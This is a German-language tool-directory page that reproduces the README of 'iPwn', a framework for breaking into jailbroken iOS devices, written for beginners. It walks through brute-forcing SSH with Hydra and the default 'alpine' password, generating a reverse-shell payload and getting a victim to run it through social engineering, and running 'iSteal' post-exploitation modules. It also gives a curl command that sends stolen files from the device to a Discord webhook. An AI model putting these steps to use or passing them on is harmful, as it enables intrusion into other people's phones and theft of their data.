Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/brows3r/ipwn
iOS-SicherheitPasswortangriffePayload-GenerierungExploitationPost-ExploitationPenetrationstestsMobile SicherheitRemote-Access-Tool
GitHubbrows3r/ipwn

iPwn

Ein Framework zur Ausnutzung von iOS-Geräten.

Repository anzeigen
23336vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

iPwn

Ein Framework zur Ausnutzung von iOS-Geräten. image

<!> DENKEN SIE DARAN: DAS IPHONE, IN DAS SIE MIT DIESEM TOOL EINDRINGEN WOLLEN, MUSS GEJAILBREAKT SEIN <!>

Status - ❌

Dieses Projekt wird noch bearbeitet. Ich füge weitere Erweiterungen und Optionen für die Post-Exploitation hinzu, um Geräteinformationen zu sammeln und andere Dinge. Ich arbeite auch an einer Möglichkeit, eine Nutzlast in einen normalen iOS-Tweak einzubetten, damit das Erhalten einer Reverse-Shell einfacher wird.

Update-Protokolle

[6/2/21] - Ein zusätzliches Menü für Personen hinzugefügt, die ihre Geräte an ihren Computer angeschlossen haben und damit herumspielen möchten. Weitere Funktionen werden bald hinzugefügt.

[6/2/21] - 4 zusätzliche Module für das Post-Exploitation-Tool 'iSteal' hinzugefügt. Außerdem eine Option zum Installieren des checkra1n-Jailbreaks hinzugefügt.

[5/25/21] - 8 zusätzliche Module für das Post-Exploitation-Tool 'iSteal' hinzugefügt.

[5/25/21] - 2 zusätzliche Module für das Post-Exploitation-Tool 'iSteal' hinzugefügt.

Beschreibung/Verwendung [FÜR ANFÄNGER!!!]

iPwn ist ein Framework, das zum Ausnutzen und Erlangen von Zugriff auf iOS-Geräte entwickelt wurde. Es enthält außerdem eine Erweiterung, die ein Mini-Framework namens 'iSteal' ist, das für die Post-Exploitation (nachdem Sie Zugriff auf das Gerät erhalten haben) gedacht ist. Diese Beschreibung führt Sie durch die verschiedenen Möglichkeiten und Schritte, um Zugriff auf ein iOS-Gerät zu erhalten und Informationen daraus zu sammeln.

Die erste Möglichkeit, Zugriff auf ein iOS-Gerät zu erhalten. - SSH-Brute-Force.

Die meisten gejailbreakten iOS-Geräte mit Cydia werden mit OpenSSH ausgeliefert. Und normalerweise sind die Anmeldedaten sehr schwach oder häufig; eines der häufigsten Passwörter ist in einer Wortliste enthalten, die in Ihrem Ordner sein sollte, wenn Sie iPwn von meinem Github heruntergeladen haben.

Also los geht's! Zunächst starten wir das Skript.

root@kitploit:~
python main.py

Dann geben wir den Befehl 'brute' ein. (Wenn Sie 'help' eingeben und sich mit den Befehlen vertraut machen möchten, können Sie das tun.) image

Sobald wir den Befehl 'brute' eingegeben haben, geben Sie 'help' ein, um alle verfügbaren Befehle anzuzeigen. image Jetzt verwenden wir den Befehl 'default', um SSH-Brute-Force mit einer Wortliste zu starten, die die häufigsten Passwörter enthält. Sie werden aufgefordert, die IP-Adresse des Ziels einzugeben. Stellen Sie sicher, dass Sie die richtige und gültige IP-Adresse eingeben, drücken Sie die Eingabetaste und fahren Sie mit dem nächsten Schritt fort. image

<!> WENN SIE FEHLER ERHALTEN, STELLEN SIE BITTE SICHER, DASS HYDRA INSTALLIERT IST. SIE KÖNNEN HYDRA MIT DEN UNTEN STEHENDEN BEFEHLEN INSTALLIEREN <!>

root@kitploit:~
commands to install hydra:

sudo apt install hydra
sudo pacman -S hydra

Zurück zum Tutorial: Wenn Hydra auf Ihrem PC installiert ist, sollte es bereits versuchen, die Anmeldedaten zu bruteforcen. Warten Sie einfach etwa 20–40 Sekunden. Wenn das Gerät die in der Wortliste enthaltenen Standard-/häufigen Anmeldedaten verwendet, sollte Hydra Ihnen eine kleine Meldung mit dem richtigen Passwort anzeigen. image

Wie wir sehen können, lautet das richtige Passwort 'alpine'. Jetzt können wir uns mit 'ssh root@ip_einfügen' in einem anderen Terminalfenster beim Telefon anmelden. Sobald Sie nach einem Passwort gefragt werden, geben Sie das Passwort ein, das Sie von Hydra erhalten haben. image

Jetzt sind wir angemeldet!

image

An diesem Punkt möchten wir wahrscheinlich einige Informationen über das Telefon sammeln und es steuern; das kommt später. Zuerst müssen wir einige sehr wichtige Dinge installieren. Wenn Sie SCP verwenden möchten, um die Setup-Datei zu übertragen, die alles automatisiert, können Sie das tun. Die Datei befindet sich unter /post-exploitation/post.sh. Sobald Sie die Datei 'post.sh' auf das iOS-Gerät übertragen haben, führen Sie sie mit 'bash post.sh' aus, und sie sollte mit der Installation und Einrichtung der Post-Exploitation-Tools beginnen, die wir verwenden werden.

<!> HINWEIS: DIE UNTEN STEHENDEN BEFEHLE SIND NUR FÜR DIE PERSONEN GEDACHT, DIE DIE NOTWENDIGEN PAKETE UND TOOLS MANUELL INSTALLIEREN MÖCHTEN <!>

root@kitploit:~
run all these commands to setup/install everything thats needed:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

Ok, jetzt wo alles installiert ist, können wir in den Ordner 'iSteal' gehen und das Post-Exploitation-Skript 'iSteal' ausführen.

root@kitploit:~
python3 post.py

<!> HINWEIS: Stellen Sie sicher, dass Sie beim Ausführen von Python-Dateien "python3" anstelle von "python" oder "py" verwenden <!>

Das Skript sollte jetzt geladen sein. Wenn Sie den Befehl 'help' verwenden und sich umsehen möchten, können Sie das tun. image

Jetzt verwenden wir den Befehl 'list', um die verfügbaren Module/Optionen für die Post-Exploitation anzuzeigen. image

<!> BEACHTEN SIE: ES WIRD VIELE UPDATES DES POST-EXPLOITATION-SKRIPTS GEBEN, UND ES WERDEN WEITERE MODULE HINZUGEFÜGT, DAHER WIRD DIESES BILD ZUM ZWECKE DER GENAUIGKEIT AKTUALISIERT <!>

Um ein Modul zu verwenden, geben Sie einfach 'use bestimmtes/modul' ein. Beispiel: use modules/list_installed_default_apps

Und wie Sie sehen können, zeigt uns dieses Modul die installierten Standardanwendungen auf dem iOS-Gerät des Ziels an. image

Die zweite Möglichkeit, Zugriff auf ein iOS-Gerät zu erhalten. - Reverse Shell.

Jetzt zeige ich Ihnen, wie es auf die zweite Art geht, die etwas fortgeschrittener ist. Bedenken Sie, dass ich für diesen Teil keine Bilder einfügen werde.

root@kitploit:~
führen Sie das iPwn-Framework mit 'python main.py' aus.
geben Sie den Befehl 'payload' ein
warten Sie, bis die Payload-Factory geladen ist.
wählen Sie eine Payload Ihrer Wahl, z. B. use payloads/factory/reverse_bash
geben Sie Ihre IP ein
geben Sie Ihren Port ein
dann sollten Sie eine Meldung 'payload generated' erhalten
geben Sie den Befehl 'back' ein, um zum Hauptmenü zurückzukehren
geben Sie den Befehl 'listen' ein, um auf eingehende Verbindungen zu warten
stellen Sie sicher, dass Ihr Opfer das Skript über das Terminal oder auf eigene Weise ausführt, versuchen Sie Social Engineering, seien Sie kreativ!
sobald das Skript auf dem iOS-Gerät des Opfers ausgeführt wird, sollten Sie eine Verbindung erhalten
installieren Sie die wichtigen Pakete, indem Sie die Datei 'post.sh' aus /post-exploitation übertragen und ausführen, oder tun Sie es manuell.
Sie können jetzt die Post-Exploitation-Tools 'iSteal' oder 'AutoEnum' ausführen
viel Spaß! :)

<!> Wenn Sie Schritt 2 durchführen und an dem Punkt, an dem Sie die wichtigen Pakete/Tools installieren müssen, nicht weiterkommen, gehen Sie zu Schritt 1 und kopieren Sie die Anleitung zur Installation der Pakete/Tools! <!>

Dateiübertragung/-extraktion

Es gibt mehrere Möglichkeiten, Dateien auf das iOS-Gerät zu übertragen, und auch viele Möglichkeiten, sie herunterzuladen. Der einfachste Weg, Dateien vom iOS-Gerät zu extrahieren und herunterzuladen, ist die Verwendung von Curl und einem Discord-Webhook.

<!> HINWEIS: Der folgende Abschnitt zeigt, wie man Dateien mit Curl vom iOS-Gerät extrahiert und herunterlädt <!>

root@kitploit:~
Schritt 1: Erstellen Sie einen Discord-Server
Schritt 2: Erstellen Sie einen Webhook und kopieren Sie den Link
Schritt 3: Navigieren Sie auf dem iOS-Gerät zu dem Verzeichnis, das die Datei enthält, die Sie abrufen möchten.
Schritt 4: Geben Sie den folgenden Befehl ein (ersetzen Sie file_here.txt mit dem Namen Ihrer Datei, ersetzen Sie webhook_url_here mit Ihrer Webhook-URL)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

Schritt 5: Warten Sie etwa 10-50 Sekunden
Fertig! Die Datei sollte jetzt auf Ihrem Discord-Server hochgeladen sein. Sie können die Datei jetzt herunterladen/ansehen.

Getestete Betriebssysteme

root@kitploit:~
Windows 10 - Stable
Garuda Linux - Stable
Arch based distros - Stable

Unterstützte und getestete iOS-Geräte

root@kitploit:~
Supported Devices [The post-exploitation extension should work for all of these]
-----------------
iPods newer than the 4th Gen iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

My own tested devices [Ones I myself have personally tested]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4th Gen

Screenshots

image image image image

Credits

[https://github.com/0x1CA3]

Tool herunterladen